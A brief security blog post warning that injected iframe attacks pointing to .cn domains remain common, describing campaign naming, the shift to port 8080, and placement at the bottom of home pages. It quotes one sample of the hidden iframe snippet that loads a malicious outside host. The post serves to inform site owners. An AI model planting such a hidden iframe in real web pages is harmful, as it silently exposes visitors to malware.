This post is a reminder that .cn iframe attacks are still among leaders.
The URLs of malicious iframes change over the time. Hackers introduce new suffixes (campaigns?) like : mozila, banner, cocacola, pepsi, add more and more domain names.
Since the pepsi campaign they started using port 8080 in the URLs.
The currently form of the malicious code looks like this
< iframe src="http:// namegamestore .cn:8080/index.php" width=118 height=195 style="visibility: hidden"></iframe>
It is usually injected at the bottom of index (home) pages.